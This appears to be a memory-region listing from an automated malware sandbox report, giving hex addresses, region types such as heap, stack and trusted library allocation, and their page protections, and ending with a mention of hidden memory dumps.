4450000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FFA000
|
heap
|
page read and write
|
||
|
749000
|
heap
|
page read and write
|
||
|
930000
|
trusted library allocation
|
page read and write
|
||
|
6FD0000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
44A0000
|
trusted library allocation
|
page read and write
|
||
|
2BA3000
|
heap
|
page read and write
|
||
|
744F000
|
stack
|
page read and write
|
||
|
2211000
|
trusted library allocation
|
page read and write
|
||
|
614E000
|
stack
|
page read and write
|
||
|
751000
|
heap
|
page read and write
|
||
|
2442000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
heap
|
page read and write
|
||
|
380000
|
trusted library allocation
|
page read and write
|
||
|
336000
|
stack
|
page read and write
|
||
|
77D000
|
heap
|
page read and write
|
||
|
4ADF000
|
stack
|
page read and write
|
||
|
C32D000
|
trusted library allocation
|
page read and write
|
||
|
24CB000
|
trusted library allocation
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
4FA0000
|
heap
|
page read and write
|
||
|
90F000
|
heap
|
page read and write
|
||
|
1A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA9000
|
heap
|
page read and write
|
||
|
4B90000
|
heap
|
page execute and read and write
|
||
|
5880000
|
heap
|
page read and write
|
||
|
147000
|
heap
|
page read and write
|
||
|
74C000
|
heap
|
page read and write
|
||
|
202000
|
trusted library allocation
|
page read and write
|
||
|
258E000
|
trusted library allocation
|
page read and write
|
||
|
5038000
|
heap
|
page read and write
|
||
|
2430000
|
trusted library allocation
|
page read and write
|
||
|
775C000
|
stack
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
872000
|
trusted library allocation
|
page read and write
|
||
|
33C000
|
stack
|
page read and write
|
||
|
3461000
|
trusted library allocation
|
page read and write
|
||
|
519E000
|
stack
|
page read and write
|
||
|
752000
|
heap
|
page read and write
|
||
|
8FB000
|
stack
|
page read and write
|
||
|
22F1000
|
trusted library allocation
|
page read and write
|
||
|
2444000
|
trusted library allocation
|
page read and write
|
||
|
26EF000
|
stack
|
page read and write
|
||
|
9A0000
|
trusted library allocation
|
page read and write
|
||
|
9AE000
|
stack
|
page read and write
|
||
|
4312000
|
trusted library allocation
|
page read and write
|
||
|
22A0000
|
trusted library allocation
|
page read and write
|
||
|
251A000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2B0F000
|
heap
|
page read and write
|
||
|
5E0F000
|
stack
|
page read and write
|
||
|
217C000
|
stack
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
3A0000
|
trusted library allocation
|
page read and write
|
||
|
3573000
|
heap
|
page read and write
|
||
|
730D000
|
stack
|
page read and write
|
||
|
2B47000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
trusted library allocation
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
4289000
|
trusted library allocation
|
page read and write
|
||
|
31F9000
|
trusted library allocation
|
page read and write
|
||
|
72B1000
|
trusted library allocation
|
page read and write
|
||
|
1C0E000
|
stack
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
21BE000
|
stack
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
2BF4000
|
heap
|
page read and write
|
||
|
2261000
|
trusted library allocation
|
page read and write
|
||
|
2558000
|
trusted library allocation
|
page read and write
|
||
|
451E000
|
stack
|
page read and write
|
||
|
779000
|
heap
|
page read and write
|
||
|
C31B000
|
trusted library allocation
|
page read and write
|
||
|
FB000
|
stack
|
page read and write
|
||
|
256C000
|
trusted library allocation
|
page read and write
|
||
|
1C6000
|
heap
|
page read and write
|
||
|
B2B1000
|
trusted library allocation
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
907000
|
heap
|
page read and write
|
||
|
2190000
|
heap
|
page read and write
|
||
|
53E0000
|
heap
|
page read and write
|
||
|
214000
|
trusted library allocation
|
page read and write
|
||
|
753000
|
heap
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
156000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
285000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C84000
|
heap
|
page read and write
|
||
|
2110000
|
trusted library allocation
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
77C000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
21BE000
|
stack
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
4F60000
|
heap
|
page read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
3EE000
|
stack
|
page read and write
|
||
|
48ED000
|
stack
|
page read and write
|
||
|
339000
|
stack
|
page read and write
|
||
|
55FE000
|
stack
|
page read and write
|
||
|
280000
|
trusted library allocation
|
page read and write
|
||
|
6D3F000
|
heap
|
page read and write
|
||
|
3FF000
|
stack
|
page read and write
|
||
|
22DF000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
C334000
|
trusted library allocation
|
page read and write
|
||
|
6E40000
|
heap
|
page read and write
|
||
|
6F9F000
|
stack
|
page read and write
|
||
|
20F0000
|
trusted library allocation
|
page read and write
|
||
|
5C20000
|
heap
|
page read and write
|
||
|
776000
|
heap
|
page read and write
|
||
|
2130000
|
trusted library allocation
|
page read and write
|
||
|
2B21000
|
heap
|
page read and write
|
||
|
2BFB000
|
heap
|
page read and write
|
||
|
5C1E000
|
stack
|
page read and write | page guard
|
||
|
4FCC000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
5EB000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page execute and read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
5D11000
|
heap
|
page read and write
|
||
|
6D4F000
|
heap
|
page read and write
|
||
|
920000
|
trusted library allocation
|
page read and write
|
||
|
1A2000
|
trusted library allocation
|
page read and write
|
||
|
3459000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
230000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D3000
|
trusted library allocation
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
C34000
|
heap
|
page read and write
|
||
|
96F000
|
stack
|
page read and write
|
||
|
12D000
|
trusted library allocation
|
page execute and read and write
|
||
|
777000
|
heap
|
page read and write
|
||
|
152000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
trusted library allocation
|
page read and write
|
||
|
376000
|
heap
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
578E000
|
stack
|
page read and write
|
||
|
32F1000
|
trusted library allocation
|
page read and write
|
||
|
1EA000
|
trusted library allocation
|
page read and write
|
||
|
529E000
|
stack
|
page read and write
|
||
|
123000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
6E1000
|
heap
|
page read and write
|
||
|
6E1000
|
heap
|
page read and write
|
||
|
48CE000
|
stack
|
page read and write
|
||
|
42F0000
|
trusted library allocation
|
page read and write
|
||
|
2B66000
|
heap
|
page read and write
|
||
|
24C8000
|
trusted library allocation
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
74B0000
|
heap
|
page read and write
|
||
|
82B1000
|
trusted library allocation
|
page read and write
|
||
|
7620000
|
heap
|
page read and write
|
||
|
328E000
|
stack
|
page read and write
|
||
|
A2B1000
|
trusted library allocation
|
page read and write
|
||
|
5E0E000
|
stack
|
page read and write | page guard
|
||
|
22B0000
|
heap
|
page execute and read and write
|
||
|
9CB1000
|
trusted library allocation
|
page read and write
|
||
|
21E0000
|
heap
|
page read and write
|
||
|
C34F000
|
trusted library allocation
|
page read and write
|
||
|
5D9000
|
trusted library allocation
|
page read and write
|
||
|
2466000
|
trusted library allocation
|
page read and write
|
||
|
6BE000
|
heap
|
page read and write
|
||
|
2AF000
|
heap
|
page read and write
|
||
|
369000
|
trusted library allocation
|
page read and write
|
||
|
207000
|
trusted library allocation
|
page execute and read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
2461000
|
trusted library allocation
|
page read and write
|
||
|
86D000
|
stack
|
page read and write
|
||
|
255F000
|
trusted library allocation
|
page read and write
|
||
|
877000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page execute and read and write
|
||
|
6EE0000
|
heap
|
page read and write
|
||
|
C327000
|
trusted library allocation
|
page read and write
|
||
|
217000
|
heap
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
5E82000
|
heap
|
page read and write
|
||
|
45E000
|
stack
|
page read and write
|
||
|
449E000
|
stack
|
page read and write
|
||
|
62AE000
|
stack
|
page read and write
|
||
|
2334000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
trusted library allocation
|
page read and write
|
||
|
5CEE000
|
stack
|
page read and write
|
||
|
5C1F000
|
stack
|
page read and write
|
||
|
6BD000
|
heap
|
page read and write
|
||
|
46DE000
|
stack
|
page read and write
|
||
|
31D1000
|
trusted library allocation
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
2240000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
4FC0000
|
heap
|
page read and write
|
||
|
285F000
|
stack
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
449E000
|
stack
|
page read and write
|
||
|
2B0D000
|
heap
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
6BC000
|
heap
|
page read and write
|
||
|
2391000
|
trusted library allocation
|
page read and write
|
||
|
6D10000
|
heap
|
page read and write
|
||
|
74D000
|
heap
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
225E000
|
stack
|
page read and write
|
||
|
5CFE000
|
stack
|
page read and write
|
||
|
1CFE000
|
stack
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
504E000
|
heap
|
page read and write
|
||
|
495F000
|
stack
|
page read and write
|
||
|
687000
|
heap
|
page read and write
|
||
|
1DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BF000
|
heap
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
5D1E000
|
stack
|
page read and write
|
||
|
6F5C000
|
stack
|
page read and write
|
||
|
97D000
|
stack
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
22A000
|
trusted library allocation
|
page read and write
|
||
|
C33F000
|
trusted library allocation
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
82F000
|
stack
|
page read and write
|
||
|
435F000
|
stack
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
43C6000
|
heap
|
page execute and read and write
|
||
|
2114000
|
heap
|
page read and write
|
||
|
2180000
|
trusted library allocation
|
page read and write
|
||
|
2B0E000
|
heap
|
page read and write
|
||
|
751000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
490F000
|
stack
|
page read and write
|
||
|
5FA0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4A0F000
|
stack
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
390000
|
trusted library allocation
|
page execute and read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
33B9000
|
trusted library allocation
|
page read and write
|
||
|
21F7000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
504C000
|
heap
|
page read and write
|
||
|
880000
|
trusted library allocation
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
4FAF000
|
heap
|
page read and write
|
||
|
2B5F000
|
stack
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
4A93000
|
heap
|
page read and write
|
||
|
7BC0000
|
heap
|
page read and write
|
||
|
258A000
|
trusted library allocation
|
page read and write
|
||
|
775000
|
heap
|
page read and write
|
||
|
430E000
|
stack
|
page read and write
|
||
|
5EC0000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
555E000
|
unkown
|
page read and write
|
||
|
2B9E000
|
stack
|
page read and write
|
||
|
21ED000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
trusted library allocation
|
page read and write
|
||
|
423000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
61A0000
|
heap
|
page read and write
|
||
|
75BF000
|
stack
|
page read and write
|
||
|
63F000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1D4000
|
trusted library allocation
|
page read and write
|
||
|
2BF8000
|
heap
|
page read and write
|
||
|
124000
|
trusted library allocation
|
page read and write
|
||
|
3391000
|
trusted library allocation
|
page read and write
|
||
|
62B1000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3018000
|
heap
|
page read and write
|
||
|
2A5E000
|
stack
|
page read and write
|
||
|
246B000
|
trusted library allocation
|
page read and write
|
||
|
213000
|
trusted library allocation
|
page execute and read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
771000
|
heap
|
page read and write
|
||
|
47E000
|
heap
|
page read and write
|
||
|
20BF000
|
stack
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
7CB1000
|
trusted library allocation
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
There are 537 hidden memdumps, click here to show them.